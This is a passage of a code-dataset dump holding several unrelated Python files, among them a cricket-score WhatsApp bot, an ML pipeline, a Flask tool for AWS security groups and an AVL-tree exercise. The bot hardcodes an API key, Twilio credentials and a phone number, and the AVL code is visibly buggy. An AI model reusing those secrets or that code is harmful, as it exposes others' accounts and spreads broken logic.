self.timeStep)\n\t\t\t\t\t\t\tinFile.writeInFile(options = [\"TEMPERATURE equal \" + str(temp), \"PRESSURE equal \" + str(press),\"RANDOM equal \" + str(randint(10000,9999999))])\n\t\t\t\t\t\t\tdataFile = dataF.AtomDataFileGenerator(filename = self.fileName,latticeType = self.latticeType,alloy = self.alloy,customLatticeConst = self.latticeConst,systemSize = size, atomTypes =self.numAtomTypes,alloyCompPercent = conc)\n\t\t\t\t\t\t\tdataFile.createDataFile()\n\t\t\t\t\t\t\tself.runLammps()\n\t\t\t\t\t\t\tos.chdir(cwd)\n\t\treturn \n\n\tdef getDiffCoeffs(self,saveFile = None):\n\t\theader = [\"Simulation Time\",\"System Size\",\"Temperature (K)\",\"Pressure (bar)\",\"Concentration\",\"Diffusion Coeff (cm\" + u\"\\u00B2\" + \"s\" + u\"\\u207B\\u00B9\" + \")\",\"Standard Error of Diff Coeff.\",\"r value of linear fit\"]\n\t\tdata = []\n\t\tcwd = os.getcwd()\n\t\tfor time in self.runTimes:\n\t\t\tfor size in self.systemSizes:\n\t\t\t\tfor temp in self.temperatures:\n\t\t\t\t\tfor press in self.pressures:\n\t\t\t\t\t\tfor conc in self.concPercents:\n\t\t\t\t\t\t\twd = self.getWorkDir(time,size,temp,press,conc)\n\t\t\t\t\t\t\tos.chdir(wd)\n\t\t\t\t\t\t\tdf = utils.readLog(self.logFile)\n\t\t\t\t\t\t\tt = [x*self.timeStep for x in df[\"Step\"]]\n\t\t\t\t\t\t\tmsd = list(df[\"c_MSD[4]\"])\n\t\t\t\t\t\t\tN = len(msd)\n\t\t\t\t\t\t\tm,b,r,p,dm = linregress(t[N//10:],msd[N//10:]) # I choose to ignore the first 10% of the data\n\t\t\t\t\t\t\tdata.append([time,size,temp,press,conc,m/60,dm/60,r])\n\t\t\t\t\t\t\tos.chdir(cwd)\n\t\tif not saveFile == None:\n\t\t\tf = open(saveFile,mode = \"w\")\n\t\t\tw = csv.writer(f)\n\t\t\tw.writerow(header)\n\t\t\tfor row in data:\n\t\t\t\tw.writerow(row)\n\t\t\tf.close()\n\t\treturn pd.DataFrame(data,columns = header)\n\t\t\n","sub_path":"lib/PyScripts/sims.py","file_name":"sims.py","file_ext":"py","file_size_in_byte":29902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96620386","text":"import requests\r\nfrom datetime import datetime\r\nclass scoreget:\r\n def __init__(self):\r\n self.url_get_all_matches=\"http://cricapi.com/api/matches\"\r\n self.url_get_scores=\"http://cricapi.com/api/cricketScore\"\r\n self.apikey=\"o92d54OkgEWBaIWDxpXBfMCYaKJ2\"\r\n self.unique_id=\"\"\r\n def get_unique_id(self):\r\n uri_params={\"apikey\":self.apikey}\r\n resp=requests.get(self.url_get_all_matches,params=uri_params)\r\n resp_dict=resp.json()\r\n uid_found=0;\r\n \r\n for i in resp_dict['matches']:\r\n if(i['team-1']==\"Delhi\" or i['team-2']==\"india\" and i['matchStarted']):\r\n todays_date=datetime.today().strftime('%Y-%m-%d')\r\n if todays_date==i['date'].split(\"T\")[0]:\r\n self.unique_id=i['unique_id'];\r\n uid_found=1\r\n break\r\n if not uid_found:\r\n self.unique_id=-1;\r\n send_data=self.current_score(self.unique_id);\r\n return send_data;\r\n \r\n def current_score(self,unique_id):\r\n data=\"\"\r\n if unique_id==-1:\r\n data=\"NO india matches today\"\r\n else:\r\n uri_params={\"apikey\":self.apikey,\"unique_id\":unique_id}\r\n resp=requests.get(self.url_get_scores,params=uri_params)\r\n resp_dict=resp.json()\r\n try:\r\n data=\"Here the score is:\\n\"+resp_dict['stat']+\"\\n\"+resp_dict['score']\r\n except KeyError as e:\r\n print(e)\r\n return data\r\n\r\n\r\nif __name__==\"__main__\":\r\n ob_score=scoreget()\r\n whatsapp_msg=ob_score.get_unique_id();\r\n print(whatsapp_msg)\r\n from twilio.rest import Client\r\n a_sid=\"ACf684ba82c43de1865fbd151977fce4a8\"\r\n auth_token=\"123bdeb15ed8079804aa458c5826d959\"\r\n client=Client(a_sid,auth_token)\r\n print(\"executed\");\r\n message=client.messages.create(body=whatsapp_msg, from_='whatsapp:+14155238886',to='whatsapp:+919640751504')\r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n","sub_path":"cric bot.py","file_name":"cric bot.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14971632","text":"\"\"\"\nBased on Beating the Benchmark by Abhishek\n\n\"\"\"\n\nimport pandas as pd\nfrom nltk import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn import decomposition, metrics, grid_search\nfrom sklearn.pipeline import FeatureUnion, Pipeline\nfrom sklearn.cross_validation import StratifiedKFold\nimport numpy as np\n\n#====================================================================\n\n\n# From: http://scikit-learn.org/stable/auto_examples/hetero_feature_union.html\nclass ItemSelector(BaseEstimator, TransformerMixin):\n \"\"\"For data grouped by feature, select subset of data at a provided key.\n\n The data is expected to be stored in a 2D data structure, where the first\n index is over features and the second is over samples. i.e.\n\n >> len(data[key]) == n_samples\n\n Please note that this is the opposite convention to sklearn feature\n matrixes (where the first index corresponds to sample).\n\n ItemSelector only requires that the collection implement getitem\n (data[key]). Examples include: a dict of lists, 2D numpy array, Pandas\n DataFrame, numpy record array, etc.\n\n >> data = {'a': [1, 5, 2, 5, 2, 8],\n 'b': [9, 4, 1, 4, 1, 3]}\n >> ds = ItemSelector(key='a')\n >> data['a'] == ds.transform(data)\n\n ItemSelector is not designed to handle data grouped by sample. (e.g. a\n list of dicts). If your data is structured this way, consider a\n transformer along the lines of\n `sklearn.feature_extraction.DictVectorizer`.\n\n Parameters\n ----------\n key : hashable, required\n The key corresponding to the desired value in a mappable.\n \"\"\"\n def __init__(self, key):\n self.key = key\n\n def fit(self, x, y=None):\n return self\n\n def transform(self, data_dict):\n return data_dict[self.key]\n\nclass LemmaTokenizer(object):\n def __init__(self):\n self.wnl = WordNetLemmatizer()\n self.stm = PorterStemmer()\n def __call__(self, doc):\n # Stem each word in the given document and return this\n # as a list of words.\n return [self.wnl.lemmatize(t) for t in word_tokenize(doc)]\n\n\nclass IdentityTransform(BaseEstimator, TransformerMixin):\n \"\"\"Extract features from each document for DictVectorizer\"\"\"\n\n def fit(self, x, y=None):\n return self\n\n def transform(self, values):\n # Needs to be a numpy array for later operations like scaling\n return np.array([[v] for v in values], dtype=float)\n\n\n# The following 3 functions have been taken from Ben Hamner's github repository\n# https://github.com/benhamner/Metrics\ndef confusion_matrix(rater_a, rater_b, min_rating=None, max_rating=None):\n \"\"\"\n Returns the confusion matrix between rater's ratings\n \"\"\"\n assert(len(rater_a) == len(rater_b))\n if min_rating is None:\n min_rating = min(rater_a + rater_b)\n if max_rating is None:\n max_rating = max(rater_a + rater_b)\n num_ratings = int(max_rating - min_rating + 1)\n conf_mat = [[0 for i in range(num_ratings)]\n for j in range(num_ratings)]\n for a, b in zip(rater_a, rater_b):\n conf_mat[a - min_rating][b - min_rating] += 1\n return conf_mat\n\n\ndef histogram(ratings, min_rating=None, max_rating=None):\n \"\"\"\n Returns the counts of each type of rating that a rater made\n \"\"\"\n if min_rating is None:\n min_rating = min(ratings)\n if max_rating is None:\n max_rating = max(ratings)\n num_ratings = int(max_rating - min_rating + 1)\n hist_ratings = [0 for x in range(num_ratings)]\n for r in ratings:\n hist_ratings[r - min_rating] += 1\n return hist_ratings\n\n\ndef quadratic_weighted_kappa(y, y_pred):\n \"\"\"\n Calculates the quadratic weighted kappa\n\n quadratic_weighted_kappa calculates the quadratic weighted kappa value,\n which is a measure of inter-rater agreement between two raters that\n provide discrete numeric ratings. Potential values range from -1\n (representing complete disagreement) to 1 (representing complete\n agreement). A kappa value of 0 is expected if all agreement is due to\n chance.\n\n quadratic_weighted_kappa(rater_a, rater_b), where rater_a and rater_b each\n correspond to a list of integer ratings. These lists must have the same\n length.\n\n The ratings should be integers, and it is assumed that they contain the\n complete range of possible ratings. quadratic_weighted_kappa(X,\n min_rating, max_rating), where min_rating is the minimum possible rating,\n and max_rating is the maximum possible rating.\n \"\"\"\n\n rater_a = y\n rater_b = y_pred\n min_rating=None\n max_rating=None\n rater_a = np.array(rater_a, dtype=int)\n rater_b = np.array(rater_b, dtype=int)\n assert(len(rater_a) == len(rater_b))\n if min_rating is None:\n min_rating = min(min(rater_a), min(rater_b))\n if max_rating is None:\n max_rating = max(max(rater_a), max(rater_b))\n conf_mat = confusion_matrix(rater_a, rater_b,\n min_rating, max_rating)\n num_ratings = len(conf_mat)\n num_scored_items = float(len(rater_a))\n\n hist_rater_a = histogram(rater_a, min_rating, max_rating)\n hist_rater_b = histogram(rater_b, min_rating, max_rating)\n\n numerator = 0.0\n denominator = 0.0\n\n for i in range(num_ratings):\n for j in range(num_ratings):\n expected_count = (hist_rater_a[i] * hist_rater_b[j]\n / num_scored_items)\n d = pow(i - j, 2.0) / pow(num_ratings - 1, 2.0)\n numerator += d * conf_mat[i][j] / num_scored_items\n denominator += d * expected_count / num_scored_items\n\n return (1.0 - numerator / denominator)\n\ndef combine_factors(x):\n s = \"{} {}\".format(x['query'], x['product_title'])\n return s\n\n\ndef build_pipe_line():\n countvect_char = TfidfVectorizer(\n tokenizer = LemmaTokenizer(),\n analyzer=\"char_wb\", \n binary=False, \n norm = None,\n stop_words = 'english')\n svd = TruncatedSVD()\n scl = StandardScaler()\n clf = SVC()\n\n p = Pipeline([\n # Use FeatureUnion to combine the features \n # query and title, and rating range\n ('features', FeatureUnion(\n transformer_list=[\n ('cvt', Pipeline([\n ('selector', ItemSelector(key='doc')),\n ('vect', countvect_char),\n ('svd', svd),\n ('scl', scl)\n ])),\n ('minr', Pipeline([\n ('selector', ItemSelector(key='maxr')),\n ('transf', IdentityTransform()),\n ('scl', scl)\n ])),\n ('maxr', Pipeline([\n ('selector', ItemSelector(key='maxr')),\n ('transf', IdentityTransform()),\n ('scl', scl)\n ])),\n ],\n # weight components in FeatureUnion\n transformer_weights={\n 'doc': 1.0,\n 'minr': 0.5,\n 'maxr': 0.5\n },\n )),\n # Use a SVC classifier on the combined features\n ('clf', clf),\n ])\n return p\n\n\nif __name__ == '__main__':\n train = pd.read_csv('../../Raw/train.csv')\n test = pd.read_csv('../../Raw/test.csv')\n train_mmr = pd.read_csv('../../Processed/train_minmaxr.csv')\n test_mmr = pd.read_csv('../../Processed/test_minmaxr.csv')\n\n # Make of copy of the query ids so we\n # can build a submission later on.\n idx = test.id.values.astype(int)\n # we dont need ID columns anymore\n train = train.drop('id', axis=1)\n test = test.drop('id', axis=1)\n\n # create labels.\n y = train.median_relevance.values\n # Now we can drop them from the training set\n # and we can drop the related info too.\n train = train.drop(['median_relevance', \n 'relevance_variance'], axis=1)\n\n trainX = pd.DataFrame({'doc':list(train.apply(combine_factors,axis=1)),\n 'minr':train_mmr['minr'],\n 'maxr':train_mmr['maxr']\n })\n testX = pd.DataFrame({'doc':list(test.apply(combine_factors, axis=1)),\n 'minr':test_mmr['minr'],\n 'maxr':test_mmr['maxr']\n })\n clf = build_pipe_line()\n\n print(\"pipeline:\", [name for name, _ in clf.steps])\n\n if True:\n # Create a parameter grid to search for \n # best parameters for everything in the pipeline\n if False:\n param_grid = {\n 'vect__ngram_range' : [(2,7), (1, 6), (2,6), (3,6), (2,5) ],\n 'vect__min_df' : list(range(3, 12, 1)), #[6]\n 'svd__n_components' : list(range(100, 350, 5)), #220\n 'clf__degree' : list(range(1, 10, 1)), #4\n 'clf__C' : list(range(5, 10, 1)),\n }\n else:\n param_grid = {\n 'features__cvt__vect__ngram_range' : [(1, 6)],\n 'features__cvt__vect__min_df' : [3],\n 'features__cvt__svd__n_components' : [240],\n 'clf__degree' : [5],\n 'clf__C' : [9]\n }\n\n # Kappa Scorer \n kappa_scorer = metrics.make_scorer(\n quadratic_weighted_kappa, greater_is_better = True)\n\n # Cross validation\n cv = StratifiedKFold(y, n_folds=3, shuffle=True, random_state=42)\n\n # Initialize Grid Search Model\n # Try many different parameters to find the best fitting model\n model = grid_search.RandomizedSearchCV(\n n_iter=1, # number of setting to try\n estimator=clf, # Pipeline\n param_distributions=param_grid,\n scoring=kappa_scorer,\n verbose=10,\n n_jobs=1, # Number of jobs to run in parallel\n cv=cv,\n iid=True,\n refit=True)\n\n # Fit Grid Search Model\n print(\"Fitting training data .\")\n model.fit(trainX, y)\n\n print(\"Best score: %0.3f\" % model.best_score_)\n print(\"Best parameters set:\")\n best_parameters = model.best_estimator_.get_params()\n for param_name in sorted(param_grid.keys()):\n print(\"\\t%s: %r\" % (param_name, best_parameters[param_name]))\n\n # Get best model\n best_model = model.best_estimator_\n # Fit model with best parameters optimized for \n # quadratic_weighted_kappa\n best_model.fit(trainX, y)\n preds = best_model.predict(testX)\n\n print(\"Creating submission\")\n # Create your first submission file\n submission = pd.DataFrame({\"id\": idx, \"prediction\": preds})\n submission.to_csv(\"Submission/sub.csv\", index=False)\n print(\"done\")\n\n\n","sub_path":"Models/BTBDocumented/sandbox3.py","file_name":"sandbox3.py","file_ext":"py","file_size_in_byte":11153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571670206","text":"import time\nimport logging\nimport os\n\nfrom functools import wraps\nfrom util import getorraise, _revoke, PyLogReqLogger, GRANT_KEY_FORMULA, fix_cidr\n\nimport redis\nimport boto.ec2\nfrom boto.utils import RequestHook\nfrom flask import Flask\nfrom flask import request, redirect, Response, render_template\n\napp = Flask(__name__)\n\nport = getorraise('PORT', 'HTTP listen port')\npassword = getorraise('PASSWORD', 'HTTP Password')\naws_access = getorraise('AWS_ACCESS_KEY', 'AWS access key')\naws_secret = getorraise('AWS_SECRET_KEY', 'AWS secret key')\nboto_region = getorraise('AWS_REGION', 'AWS region')\nredis_url = getorraise('REDIS_URL', 'Redis URL')\n\ndebug = os.getenv('DEBUG')\ndebug = debug is not None\n\ndef check_auth(given_username, given_password):\n \"\"\"This function is called to check if a username /\n password combination is valid.\n \"\"\"\n return given_username == 'root' and given_password == password\n\ndef authenticate():\n \"\"\"Sends a 401 response that enables basic auth\"\"\"\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth = request.authorization\n if not auth or not check_auth(auth.username, auth.password):\n return authenticate()\n return f(*args, **kwargs)\n return decorated\n\ndef requires_ec2(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n ec2 = boto.ec2.connect_to_region(boto_region, aws_access_key_id=aws_access, aws_secret_access_key=aws_secret)\n ec2.set_request_hook(PyLogReqLogger())\n kwargs['ec2'] = ec2\n return f(*args, **kwargs)\n return decorated\n\ndef requires_rds(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n kwargs['rds'] = redis.from_url(redis_url)\n return f(*args, **kwargs)\n return decorated\n\n@app.route('/')\n@requires_auth\n@requires_ec2\n@requires_rds\ndef index(ec2=None, rds=None):\n security_groups = ec2.get_all_security_groups()\n return render_template('index.html', security_groups=security_groups)\n\n@app.route('/edit/')\n@requires_auth\n@requires_ec2\n@requires_rds\ndef edit(group_id, ec2=None, rds=None):\n security_groups = ec2.get_all_security_groups(group_ids=[group_id])\n\n if len(security_groups) == 0:\n return \"Missing security groups\"\n\n security_group = security_groups[0]\n\n for rule in security_group.rules:\n grants_with_cidrs = []\n\n for grant in rule.grants:\n if grant.cidr_ip:\n ttl = rds.get(GRANT_KEY_FORMULA.format(security_group_id=group_id, protocol=rule.ip_protocol, from_port=rule.from_port, to_port=rule.to_port, cidr=grant.cidr_ip))\n\n if ttl is None or ttl == 0:\n grant.time_left = ttl\n else:\n grant.time_left = int(float(ttl) - time.time())\n\n grants_with_cidrs.append(grant)\n\n rule.grants = grants_with_cidrs\n \n if 'X-Forwarded-For' in request.headers:\n ip = request.headers['X-Forwarded-For']\n else:\n ip = request.remote_addr\n\n return render_template('edit.html', ip=ip, security_group=security_group)\n\n@app.route('/grant', methods=[\"POST\"])\n@requires_auth\n@requires_ec2\n@requires_rds\ndef authorize(ec2=None, rds=None):\n security_group_id, protocol, cidr, from_port, to_port, duration = request.form['security_group_id'], request.form['protocol'], request.form['cidr'], int(request.form['from_port']), int(request.form['to_port']), int(request.form['duration'])\n\n cidr_fixed = fix_cidr(cidr)\n\n security_groups = ec2.get_all_security_groups(group_ids=[security_group_id])\n\n if len(security_groups) == 0:\n return \"Security group not found\"\n\n security_group = security_groups[0]\n\n if security_group.authorize(ip_protocol=protocol, from_port=from_port, to_port=to_port, cidr_ip=cidr_fixed):\n grant_key = GRANT_KEY_FORMULA.format(security_group_id=security_group_id, protocol=protocol, from_port=from_port, to_port=to_port, cidr=cidr_fixed)\n rds.set(grant_key, str(time.time() + duration))\n return redirect(\"/edit/\" + security_group_id)\n else:\n return \"An error occurred\"\n\n@app.route('/persist')\n@requires_auth\n@requires_ec2\n@requires_rds\ndef persist(ec2=None, rds=None):\n security_group_id, protocol, cidr, from_port, to_port = request.args.get('security_group_id'), request.args.get('protocol'), request.args.get('cidr'), int(request.args.get('from_port')), int(request.args.get('to_port'))\n\n grant_key = GRANT_KEY_FORMULA.format(security_group_id=security_group_id, protocol=protocol, from_port=from_port, to_port=to_port, cidr=cidr)\n rds.delete(grant_key)\n return redirect(\"/edit/\" + security_group_id)\n\n@app.route('/revoke')\n@requires_auth\n@requires_ec2\n@requires_rds\ndef revoke(ec2=None, rds=None):\n security_group_id, protocol, cidr, from_port, to_port = request.args.get('security_group_id'), request.args.get('protocol'), request.args.get('cidr'), request.args.get('from_port'), request.args.get('to_port')\n\n security_groups = ec2.get_all_security_groups(group_ids=[security_group_id])\n\n if len(security_groups) == 0:\n return \"Security group not found\"\n\n security_group = security_groups[0]\n\n if _revoke(rds, security_group, protocol, from_port, to_port, cidr):\n return redirect(\"/edit/\" + security_group_id)\n else:\n return \"An error occurred\"\n\n\nif __name__ == \"__main__\":\n app.run(debug=debug, host='0.0.0.0', port=int(os.getenv(\"PORT\")))\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649871943","text":"import json,requests\nfrom bs4 import BeautifulSoup\n\n# str = '[{\"username\":\"dachong\", \"age\":\"18\"}]'\n# print(type(str))\n# json_str = json.dumps(str, ensure_ascii=False)\n# print(json_str, type(json_str))\n#\n# new_str = json.loads(str)\n# print(new_str,type(new_str))\n#\n# with open(\"temp.json\",\"w\") as f:\n# json.dump(json.loads(str),fp=f,indent=4)\n# # sss=[]\n# # with open(\"temp.json\",\"r\") as f:\n# # sss=json.load(f)\n# # print(sss)\n# https://blog.csdn.net/anthony_1223/article/details/82259286\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\"\n}\nrsp = requests.get(\"http://www.seputu.com/\",headers = headers)\nrsp.encoding = rsp.apparent_encoding\n# print(rsp.text)\nsoup = BeautifulSoup(rsp.text, \"lxml\")\ncontent = []\nmulus = soup.find_all(class_= \"mulu\")\n# print(len(items))\nfor mulu in mulus:\n # 标题\n big_title = mulu.find(name = \"h2\")\n\n if big_title !=None:\n big_title = big_title.string\n list = []\n # print(title)\n for a in mulu.find(class_= \"box\").find_all(\"a\"):\n href = a.get(\"href\")\n small_title = a.get(\"title\")\n print(href,small_title)\n list.append({\"href\":href,\"small_title\":small_title})\n content.append({\"big_title\": big_title,\"content\": list})\n# print(content)\n# str_content = str(content)\n# print(type(str_content))\nwith open(\"gcd.json\", \"a\", encoding=\"utf-8\") as f:\n json.dump(content,fp=f,ensure_ascii=False,indent=4)","sub_path":"习题班/数据存储/to_json.py","file_name":"to_json.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"561536594","text":"#File: validDate.py\n#Name: Carole(Chia Jung) Sung\n#Login Name: carole07@bu.edu\n#Assignment: Hw6 Part3\n#Date: Feb 6 2018\n#Description: Contains a function that takes parameters for the month, day, year and returns the boolean constant True if it's valid and False otherwise.\n\ndef valid_date(month, day, year):\n #Returns True if given a valid date and returns False otherwise.\n month31 = (1,3, 5, 7, 8, 10, 12)\n month30 = (4,6,9,11)\n #Checks if given month is in the sequence of months that have 31 days\n if month in month31:\n #Returns whether day is in valid range (boolean)\n return day <= 31\n #Checks if given month is in the sequence of months that have 30 days\n elif month in month30:\n #Returns whether day is in valid range (boolean)\n return day <= 30\n #Checks case for month of february\n elif month == 2:\n \n if year % 4 == 0 and year %400 == 0:\n #Leap year\n return day <= 29\n else:\n return day <= 28\n else:\n return False\n\n########################################\n \nprint(\"Test Cases:\")\nprint(\"valid_date(2,7,2017):\",valid_date(2,7,2017))\nprint(\"valid_date(2,29,2017):\",valid_date(2,29,2017))\nprint(\"valid_date(1,32,2017):\",valid_date(1,32,2017))\nprint(\"valid_date(13,7,2017):\",valid_date(13,7,2017))\nprint(\"valid_date(4,31,2017):\",valid_date(4,31,2017))\nprint(\"valid_date(5,24,2008):\",valid_date(5,24,2008))\n\n","sub_path":"hw6/validDate.py","file_name":"validDate.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"88801891","text":"import sys\n\nclass Arbre:\n\t\n\tdef __init__(self, m):\n\t\tself.mot=m\n\t\tself.g=None\n\t\tself.d=None\n\t\t\n\t\t\n\tdef __str__(self):\n\t\treturn str(self.mot)\n\t\n\tdef arbrenouv():\n\t\treturn None\t\n\t\t\n\t##Fonction d'insertion\t\n\tdef insert(self, m):\n\t\tif(self.vide()):\n\t\t\tself=self.e(arbrenouv(),m,arbrenouv())\n\t\t\treturn self\n\t\tif m == self.r():\n\t\t\treturn self\n\t\tif m < self.mot:\n\t\t\tif self.g is None:\n\t\t\t\tself.g = Arbre(m)\n\t\t\telse:\n\t\t\t\tself.g.insert(m)\n\t\tif m > self.mot:\n\t\t\tif self.d is None:\n\t\t\t\tself.d = Arbre(m)\n\t\t\telse:\n\t\t\t\tself.d.insert(m)\n\t\tself=self.reeq()\n\t\treturn self\t\t\t\n\n\t\t\t\n\t\t\t\t\n\t\n\n\t\t\n\n\tdef r(self):\n\t\treturn self.mot\n\n\t\t\t\t\n\tdef rechercherMot(self, m):\n\t\tif self.vide():\n\t\t\treturn self\n\t\tif m == self.mot:\n\t\t\treturn self\n\t\tif m < self.mot:\n\t\t\treturn rechercherMot(self.g, m);\n\t\tif m > self.mot:\n\t\t\treturn rechercherMot(self.d, m);\n\t\t\n\n\tdef vide(self):\n\t\treturn self.mot is None;\n\t\n\tdef aff(self, level=0):\n\t\tif self.d:\n\t\t\tself.d.aff(level+1)\n\t\tprint(f\"{' ' * 4 * level}{self.mot}\")\n\t\tif self.g:\n\t\t\tself.g.aff(level +1)\t\n\n\tdef haut(self):\n\t\tif self == None:\n\t\t\treturn 0;\n\t\treturn 1 + max(self.g.haut() if self.g else 0, self.d.haut() if self.d else 0);\n\t\n\tdef reeq(self):\n\t\tif(self.deseq()==2 and (self.g).deseq()>=0):\n\t\t\tself = self.rd();\n\t\tif(self.deseq()==-2 and (self.d).deseq()<=0):\n\t\t\tprint(\"errr\")\n\t\t\tself.rg()\n\t\t\treturn self\t\n\t\tif(self.deseq()==2 and (self.g).deseq()==-1):\n\t\t\tself = self.rgd()\n\t\tif(self.deseq()==-2 and (self.d).deseq()==1):\n\t\t\tself = self.rdg()\n\t\treturn self\t\n\t\n\tdef rd(self):\n\t\tif (self.vide()):\n\t\t\treturn self\n\t\tif self.g.vide():\n\t\t\texit(1) \t\n\t\treturn self.e((self.g).g, (self.g).r(), self.e((self.g).d,self.r(),self.d))\n\n\n\tdef e(self, a, m, b):\n\t\tc = Arbre(m)\n\t\tc.g=a\n\t\tc.d=b\n\t\treturn c\n\t\t\t\n\tdef rg(self):\n\t\tif (self.vide()):\n\t\t\treturn self\n\t\tif (self.d.vide()):\n\t\t\texit(1)\n\t\t\n\t\treturn self.e(self.e(self.g,self.r(),self.d.g),self.d.r(),self.d.d)\t\n\n\t\n\n\tdef rgd(self):\n\t\tif (self.vide()):\n\t\t\treturn self\n\t\treturn self.e(self.g.rg(),self.r(),self.d).rd()\n\t\n\tdef rdg(self):\n\t\tif (self.vide()):\n\t\t\treturn self\n\t\treturn self.e(self.g,self.r(),self.d.rd()).rg()\n\t\t\t\n\tdef deseq(self):\n\t\tif(self.vide()):\n\t\t\treturn 0;\n\t\tif self.g == None and self.d == None:\n\t\t\treturn 0\t\n\t\tif self.g == None:\t\n\t\t\treturn 0 - self.d.haut()\n\t\tif self.d == None:\n\t\t\treturn self.g.haut()\n\t\treturn self.g.haut() - self.d.haut()\n\t\t\t\t\t\n\t\t\t\t\t\t\t\t\ndef getDictionnaire():\n\ta = Arbre(\"a\")\n\tfile = open(\"testdic.txt\", \"r\")\n\tlignes = file.readlines()\n\tfor ligne in lignes:\n\t\tmot = ligne.rstrip('\\n')\n\t\ta.insert(mot)\n\treturn a\n\nsys.setrecursionlimit(10000)\t\n#dic=getDictionnaire();\nr=10000\na = Arbre(\"arbre1\")\n#a.insert(\"poney\")\n\n#a.insert(\"pute\")\n\n#a.insert(\"pedale\")\n\n#a.insert(\"putain\")\n\n#a.insert(\"pupupute\")\nb = Arbre(\"arbre2\")\nc =Arbre(\"thzda\")\nprint(\"---\")\nc.insert(\"z\")\nc.insert(\"zz\")\nc.insert(\"zzz\")\nr=c.deseq()\nt=c.d.deseq()\nprint(r)\nprint(t)\nprint(\"---\")\nc.insert(\"zzzz\")\nr=c.deseq()\nt=c.d.deseq()\nprint(r)\nprint(t)\nprint(\"---\")\nc.insert(\"zzzzz\")\nr=c.deseq()\nt=c.d.deseq()\n\nprint(r)\nprint(t)\nprint(\"---\")\nc.insert(\"zzzzzzz\")\nr=c.deseq()\nt=c.d.deseq()\nprint(r)\nprint(t)\nprint(\"---\")\nc.aff()\n\n\t\t\t\t\t\n#\t\t\t\t\t\n#if m < self.mot:\n#\t\t\tif self.g is None:\n#\t\t\t\tself.g = Arbre(m)\n#\t\t\telse:\n#\t\t\t\tself.g.insert(m)\n#\t\telif m > self.mot:\n#\t\t\tif self.d is None:\n#\t\t\t\tself.d = Arbre(m)\n#\t\t\telse:\n#\t\t\t\tself.d.insert(m)\n#\t\ta = self.reeq()\n#\t\tprint(a)\n#\t\tprint(\"----\")\n#\t\treturn a\t","sub_path":"DEV/python/Arbre.py","file_name":"Arbre.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624087020","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 11 10:55:12 2021\r\n\r\n@author: vidhya\r\n\"\"\"\r\n\r\nfrom numpy import random\r\n\r\nrandom.seed(0)\r\n\r\n# Total number of number of people in a age group & purchases done by various age group\r\ntotals = {20:0, 30:0, 40:0, 50:0, 60:0, 70:0}\r\npurchases = {20:0, 30:0, 40:0, 50:0, 60:0, 70:0}\r\n\r\ntotal_purchases = 0\r\n\r\nfor _ in range(100000):\r\n age_decade = random.choice([20, 30, 40, 50, 60, 70])\r\n # the data is created such that purchases increases with age\r\n purchase_prob = age_decade / 100\r\n totals[age_decade] += 1\r\n if(random.random() < purchase_prob):\r\n total_purchases += 1\r\n purchases[age_decade] += 1\r\n \r\nprint(totals)\r\nprint(purchases)\r\nprint(total_purchases)\r\n\r\n# P(E|F) P(Purchase|age=30)\r\n\r\nPEF = purchases[30] / totals[30]\r\nprint('P(Purchase|age=30) : ' + str(PEF))\r\n\r\nPF = totals[30] / 100000\r\nprint('P(age=30) : ' + str(PF))\r\n\r\nPE = total_purchases / 100000\r\nprint('P(Purchases) : ' + str(PE))\r\n\r\n# P(E,F)\r\nprint('P(E,F) : ' + str(purchases[30]/100000))\r\n\r\n# only dep, then P(E,F) is not equal to P(E)P(F)\r\nprint('P(E)P(F) : ' + str(PE * PF))\r\n\r\nprint('P(E,F)/P(F) : ' + str(purchases[30]/(100000 * PF)))","sub_path":"Statistics/Conditional_Probablity.py","file_name":"Conditional_Probablity.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"593621680","text":"from django.conf.urls import include, url\r\n\r\nfrom homepage import views\r\n\r\nurlpatterns = [\r\n url (r'^$', views.Index.as_view (), name = 'homepage-index'),\r\n url (r'^accounts/profile', views.login_redirect, name = 'login-redirect'),\r\n url (r'^contact$', views.Contact.as_view (), name = 'homepage-contact'),\r\n url (r'^about$', views.about, name = 'homepage-about'),\r\n url (r'^faq$', views.faq, name = 'homepage-faq'),\r\n url (r'^game$', views.game, name = 'homepage-game'),\r\n url (r'^twibbon$', views.twibbon, name = 'homepage-twibbon'),\r\n url (r'^event/', include ([\r\n url (r'^nlc$', views.event_nlc, name = 'homepage-event-nlc'),\r\n url (r'^npc$', views.event_npc, name = 'homepage-event-npc'),\r\n url (r'^nst$', views.event_nst, name = 'homepage-event-nst'),\r\n url (r'^reeva$', views.event_reeva, name = 